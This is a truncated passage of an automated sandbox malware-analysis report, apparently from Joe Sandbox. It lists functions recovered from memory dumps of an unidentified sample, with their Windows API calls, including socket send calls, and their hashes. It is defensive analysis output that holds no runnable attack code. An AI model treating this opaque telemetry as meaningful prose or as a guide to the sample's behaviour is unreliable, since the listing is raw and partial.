                                                                                                                                                                        • Part of subcall function 02C69754: TlsGetValue.KERNEL32(00000000,02C698AD,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000), ref: 02C6975D
                                                                                                                                                                        • Part of subcall function 02C69754: DecodePointer.KERNEL32(?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA,0000000D), ref: 02C6976F
                                                                                                                                                                        • Part of subcall function 02C69754: TlsSetValue.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C6977E
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C671C7
                                                                                                                                                                        • Part of subcall function 02C69734: TlsGetValue.KERNEL32(?,?,02C671CC,00000000), ref: 02C69742
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C671DA
                                                                                                                                                                        • Part of subcall function 02C69788: DecodePointer.KERNEL32(?,?,?,02C671DF,00000000,?,00000000), ref: 02C69799
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C671E3
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C671EA
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C671F0
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C67210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                      • Opcode ID: dcc65cb04a5a40840b73ea77ba24e09d106e31f8adac22ac207de0aff5ceb80f
                                                                                                                                                                      • Instruction ID: dac45f0fd5085faf2bc386398a9dc903b2aa2e418217fa2694ed411672c917fa
                                                                                                                                                                      • Opcode Fuzzy Hash: dcc65cb04a5a40840b73ea77ba24e09d106e31f8adac22ac207de0aff5ceb80f
                                                                                                                                                                      • Instruction Fuzzy Hash: AFE0EC35C406096BCF107FF18DCCAFF7A6E9E45399B144D10EE1493001EF389965AEA5
                                                                                                                                                                      Function 03779430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377944A
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779482
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                      • API String ID: 1823113695-4289949731
                                                                                                                                                                      • Opcode ID: fc52b779fa5fb87f22dc426ce10d543a9d17a0bc307ba7d5ef0cc2544bd01294
                                                                                                                                                                      • Instruction ID: efc2c03cd08aba9b10093651a7f3bf7e2ccd75a3c862186502ad2e9538ed1c6c
                                                                                                                                                                      • Opcode Fuzzy Hash: fc52b779fa5fb87f22dc426ce10d543a9d17a0bc307ba7d5ef0cc2544bd01294
                                                                                                                                                                      • Instruction Fuzzy Hash: 5321D8337013109BDB21EE6CF88095BF7E9EB93664B240A6FE292CB741D761D940C3A1
                                                                                                                                                                      Function 037784B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037784C9
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037784E7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                      • API String ID: 963545896-4289949731
                                                                                                                                                                      • Opcode ID: bf40712d8e3970a2dace2942d3d788866641e281798bb75d4d25a2628bc15421
                                                                                                                                                                      • Instruction ID: 717b8f712763af27e36b71ad1d60942808fc0128ef2732d9c3dc174c9f303ee1
                                                                                                                                                                      • Opcode Fuzzy Hash: bf40712d8e3970a2dace2942d3d788866641e281798bb75d4d25a2628bc15421
                                                                                                                                                                      • Instruction Fuzzy Hash: 03219D72700306ABCF14DF6CE889859B3AABF88350714466EF516CB641EB30EA54C792
                                                                                                                                                                      Function 02BE3A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02BE3A3A
                                                                                                                                                                        • Part of subcall function 02BE3995: ___BuildCatchObjectHelper.LIBCMT ref: 02BE39CB
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02BE3A51
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3487967840-3733052814
                                                                                                                                                                      • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                      • Instruction ID: cd0639a302832e33238d652a63581382a00d383911357538566c134bfd36e8d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                      • Instruction Fuzzy Hash: AF01E47100010ABBDF12AE51CC44EAE7FAAEF08354F048090BD2A16160D73299A1DBA1
                                                                                                                                                                      Function 0377D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0377D868
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0377D938
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377D963
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Read$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2715074504-0
                                                                                                                                                                      • Opcode ID: edbdb1b9a04e95681ca9efeb825c283bd3f3cae2615897e7d8e0a917a5ab6a62
                                                                                                                                                                      • Instruction ID: e061e3b7e90980734be5e0d1ce184a5187701bb5bb939f79c4ace526a2c9c01d
                                                                                                                                                                      • Opcode Fuzzy Hash: edbdb1b9a04e95681ca9efeb825c283bd3f3cae2615897e7d8e0a917a5ab6a62
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A419E71A00209ABDB20DF99DC80B6AF3F9FF88314F1885A9E85997351D774F911CB50
                                                                                                                                                                      Function 02BD9A9D Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2478854527-0
                                                                                                                                                                      • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                      • Instruction ID: 4be82c3ba73a350aeca1fe20b3b7ab96338cdc4cb04dc3c44c4408387c98a7f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                      • Instruction Fuzzy Hash: 86313B31940E35EEFB21AF748D887993EE6EB49365B188566E414DB2B0FB31C081CF50
                                                                                                                                                                      Function 036039D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2478854527-0
                                                                                                                                                                      • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                      • Instruction ID: c0d80637c75b2fed8c9acdf0db96c1d41f123d936fc30c1bd01686cdd088d7cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                      • Instruction Fuzzy Hash: A1318D39902730EFEB16EB758D99A17BFA4EB44761B24451AF910DA3B1E7708051DF40
                                                                                                                                                                      Function 0378A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0378A5F6
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0378A629
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0378A65A
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0378A6C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: d2d44240c2fb2d50508cfa39d47d823676f68932a5a3f6096fd77d7121c7e753
                                                                                                                                                                      • Instruction ID: ce1356c43f454e77a7d58b263d30728eefbbd39463e825a5e257371e17026e54
                                                                                                                                                                      • Opcode Fuzzy Hash: d2d44240c2fb2d50508cfa39d47d823676f68932a5a3f6096fd77d7121c7e753
                                                                                                                                                                      • Instruction Fuzzy Hash: 7831F231A81246EFCF60EF64C894EBEBBB5BF01310F1885AAE5518B195D330D990DB50
                                                                                                                                                                      Function 02C6E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C6E459
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 02C6E48C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C6E4BD
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C6E52B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      • Opcode ID: 44a138fd3025d2bae21d36c6f53276f6f68c24f2f7f1e01409c4ac7636b9081b
                                                                                                                                                                      • Instruction ID: bfda68b0748dfc041a224fcd711d1df0ac5bb150e25d883c664d0ddc26f7e7bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 44a138fd3025d2bae21d36c6f53276f6f68c24f2f7f1e01409c4ac7636b9081b
                                                                                                                                                                      • Instruction Fuzzy Hash: B331E135A00255EFDF20DFB4C8C8EBA3BA6EF49314F1885AAE4658B590E330DA40DF51
                                                                                                                                                                      Function 03778020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2425037729-0
                                                                                                                                                                      • Opcode ID: a8e8a58d804d7bb3da58d748ccc4fce6704bb2dc5a522f9905fd80b161ec3234
                                                                                                                                                                      • Instruction ID: 33ffddde8df13b2513d85ebe2546671c88c468af74a32a9b8ce245bd02cea61a
                                                                                                                                                                      • Opcode Fuzzy Hash: a8e8a58d804d7bb3da58d748ccc4fce6704bb2dc5a522f9905fd80b161ec3234
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D21FB7670020CBBCF14DF69DC8A9BEB3A9EBC4710B29816DED0987201F7319D51C6A2
                                                                                                                                                                      Function 03774380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 037743EC
                                                                                                                                                                        • Part of subcall function 037713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037713CB
                                                                                                                                                                        • Part of subcall function 037741E0: EnterCriticalSection.KERNEL32(03774FB5,03774E55,037742BE,00000000,?,?,03774E55,?,?,?,?,00000000,000000FF), ref: 037741E8
                                                                                                                                                                        • Part of subcall function 037741E0: LeaveCriticalSection.KERNEL32(03774FB5,?,?,?,00000000,000000FF), ref: 037741F6
                                                                                                                                                                        • Part of subcall function 03774C70: HeapFree.KERNEL32(?,00000000,?,00000000,03774E55,?,037742C8,03774E55,00000000,?,?,03774E55,?), ref: 03774C97
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 037743D7
                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 03774401
                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 03774410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2060118545-0
                                                                                                                                                                      • Opcode ID: 87bea9607807db6c97d5dc4b0c3ac44040978e0e5e3bf0c2b7401ddef13c0159
                                                                                                                                                                      • Instruction ID: 117c562c6a62494fa1dc80c80c28d5c40e546767af21526f0739c5b1b3276278
                                                                                                                                                                      • Opcode Fuzzy Hash: 87bea9607807db6c97d5dc4b0c3ac44040978e0e5e3bf0c2b7401ddef13c0159
                                                                                                                                                                      • Instruction Fuzzy Hash: B5118A3AA0551CA79F10FF7AF84459EB7A8EF88232B5945A6EC0CD7200D735991147D0
                                                                                                                                                                      Function 02C64380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C643EC
                                                                                                                                                                        • Part of subcall function 02C613A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C613CB
                                                                                                                                                                        • Part of subcall function 02C64C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C64E35,?,02C642C8,02C64E35,00000000,?,?,02C64E35,?), ref: 02C64C77
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 02C643D7
                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 02C64401
                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 02C64410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$Heap$AllocFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1906775185-0
                                                                                                                                                                      • Opcode ID: 932990369cb7396857af15be64af0d1e6626fae99d2695f68e56f2cbc7d09c05
                                                                                                                                                                      • Instruction ID: 65afc4091d9eb9698985674db7ba842a86aea3f9078f96db6e7a0c05be0c912b
                                                                                                                                                                      • Opcode Fuzzy Hash: 932990369cb7396857af15be64af0d1e6626fae99d2695f68e56f2cbc7d09c05
                                                                                                                                                                      • Instruction Fuzzy Hash: 15110A36E055189B8730EE69F8C8AFEB7A8EFC4372B5805B6ED0DD7200D735891546D0
                                                                                                                                                                      Function 0377DE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0377DE93
                                                                                                                                                                      • _free.LIBCMT ref: 0377DED5
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0377DC95), ref: 0377DEFC
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0377DF03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap_free$FreeProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1072109031-0
                                                                                                                                                                      • Opcode ID: 7aeb1aff4e6529adf67f328b9ab445bbd00e55e4b96b58b2397cee3c7a81be1a
                                                                                                                                                                      • Instruction ID: 671f3382f3a6f4780610e5a2568e359b751a395cacbaf6cda57fadb0d9cc84a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 7aeb1aff4e6529adf67f328b9ab445bbd00e55e4b96b58b2397cee3c7a81be1a
                                                                                                                                                                      • Instruction Fuzzy Hash: B3112B75600700ABDB31DB65CD49F67B3AABF84710F18891CE59A87A90D7B4F842CB91
                                                                                                                                                                      Function 03773BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,03773ABB,00000023), ref: 03773C02
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03773C0D
                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 03773C58
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03773C63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                      • Opcode ID: ad076b65693530555dfec912aa4ac8553ae87b91e0565c05fc920ef8f4390118
                                                                                                                                                                      • Instruction ID: e5c1f1dc5452c9ce800a9aa5d9ab30bff8e2d384afa2f7e27a57630e239e3d64
                                                                                                                                                                      • Opcode Fuzzy Hash: ad076b65693530555dfec912aa4ac8553ae87b91e0565c05fc920ef8f4390118
                                                                                                                                                                      • Instruction Fuzzy Hash: 9511A3B5600700ABEB20EF79D888A57B6FDFB8C710F114A2DF656C7680D735E4009B90
                                                                                                                                                                      Function 02C63BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,02C63ABB,00000023), ref: 02C63C02
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C63C0D
                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 02C63C58
                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C63C63
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                      • Opcode ID: f32e0a5c443ec25fac3aa32c9f6b28069578856e6b752a30b81a3c8ee4901779
                                                                                                                                                                      • Instruction ID: 1b2d0a9b6bab8553ca42ec2826ca5d6390b875636b2ae47c314b0a2ca6a927d1
                                                                                                                                                                      • Opcode Fuzzy Hash: f32e0a5c443ec25fac3aa32c9f6b28069578856e6b752a30b81a3c8ee4901779
                                                                                                                                                                      • Instruction Fuzzy Hash: E5113AB6A00B406BD3209B79D8CCA67B6EABB88B15B410A2DF957C3A80D771E5409B50
                                                                                                                                                                      Function 0378BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
